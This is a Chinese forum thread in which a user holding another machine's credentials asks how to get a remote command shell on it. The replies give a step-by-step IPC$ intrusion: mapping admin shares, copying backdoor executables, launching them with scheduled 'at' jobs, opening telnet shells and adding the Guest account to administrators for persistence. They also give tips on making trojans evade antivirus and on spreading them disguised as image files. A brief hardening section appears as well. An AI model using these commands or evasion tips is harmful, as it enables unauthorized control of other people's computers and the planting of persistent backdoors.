仪器社区

如何获取cmdshell

小TP33 2007-07-30
我对cmdshell不是很熟悉,目前只知道可以用 net use \\ip\ipc$ 来建立一个空的IPC$连接,然后用at命令。。。 但是问题在于,有的机器的Task Scheduler是关闭的 比如说我已经知道机器192.168.1.2的用户名为abcdef,密码为123456 我想知道如何取得它的cm... 我对cmdshell不是很熟悉,目前只知道可以用 net use \\ip\ipc$ 来建立一个空的IPC$连接,然后用at命令。。。 但是问题在于,有的机器的Task Scheduler是关闭的 比如说我已经知道机器192.168.1.2的用户名为abcdef,密码为123456 我想知道如何取得它的cmdshell? 然后是否可以在cmdshell里面用 sc config schedule start= auto sc start schedule 这两条命令启动Task Scheduler服务? 先谢谢各位的帮助了!
评论
全部评论
crystallyne
获取cmdshell一般就两种方法1.木马2.溢出工具进行溢出
两者相比较而言第二种比diyi种简单,而且更成功率高。(溢出工具可以去网上下载,,)
先说diyi种;
木马获取cmdshellZ重要的就两点:1.免杀2.如何传播(下载并在目标电脑上运行)
1.免杀Z好用复合特征码定位器进行修改(这个需要会一点汇编)
接着就是加一加花指令,,加加壳就行了(Z好是生僻壳,如果用仙剑之类的壳,Z好加完壳后再改特征码)Z后是行为免杀,(这个太难我也不会)
2.在目标电脑上执行木马,一般可以用捆绑器,和图片捆绑成。exe的文件
让后压缩以下,不然qq没法传,,,当然也可以做成自解压的,然后加几句脚本,解压并自运行木马。。
网页木马是Z麻烦的,,需要一个空间,,asp的,,网马生成器,然后用生成器把木马变成网页的,再上传就行了,,因为成功率低,,而且麻烦,,所以我从来不用,,因为防火墙可以拦截大部分网马,,除非是ie漏洞的网马,,可惜我没有,,

溢出的就不说了,,只要有工具,,再懂一点英文傻子都会用。。。

知道密码帐号的话可以用telnet,但如果是xp系统必须现开服务,,telnet服务默认不开,,但可以用远程登录器,可以直接登录,可如果目标有防火墙就会被拦截,

如果要开对方的服务,Z好写成bat,,然后再写一个vb脚本让对方下载并执行,,这样的话成功率几乎为。

再往下看就是是网上摘抄的,,和上面提到的具体做法和教程,,我的博客里也有不少的东西可以看看::

net use \\IP\ipc$ password /user:admin
copy backdoor.exe \\IP\admin$\system32
net time \\IP
at \\IP 23:00 backdoor.exe

ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了。

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟)。

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的。

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;

错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;

目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了。

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,......可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码

八 相关命令

1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以diyi个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。

网上的资料:
http://bbs.hackerxfiles.net/thread-62418-1-1.html

http://bbs.hackerxfiles.net/thread-65045-1-1.html

http://bbs.hackerxfiles.net/thread-64434-1-1.html

http://bbs.hackerxfiles.net/thread-10576-1-1.html

http://bbs.hackerxfiles.net/thread-61164-1-1.html

资料差不多了,,我的博客里还有一些,,看完后就应该没问题了。。
http://hi.baidu.com/lihanfeifan
7 0 2016-03-05 0条评论 回复
枪杀EAGLE
普通人都是用软件和木马.真正的黑客用微软的漏洞,病毒和自已写的工具来控制别人的电脑.
5 0 2007-07-31 0条评论 回复
我的大三大四
大哥 你都知道了他的帐户密码..简单多了..
你可以远程桌面..直接连接..那就跟你自己用你的操作系统一样..然后你想怎样就怎样 一般你可以上传个木马然后控制 打开3389端口 或者打开TELNET 服务.. 以后就是你肉鸡了..
8 0 2007-08-04 0条评论 回复
94481877
6885604

说的对!

既然你都能建立IPC连接了...

你可以把远程桌面桌面的启动程序COPY到对方的机器里,在AT自动运行。

这样的话,对方的远程桌面就会被开启。

随后你就可以远程控制了!

其实只要你能知道对方的帐户和密码...

控制的方法会有很多的。
4 0 2007-08-05 0条评论 回复
您可能感兴趣的社区主题
加载中...
发布 评论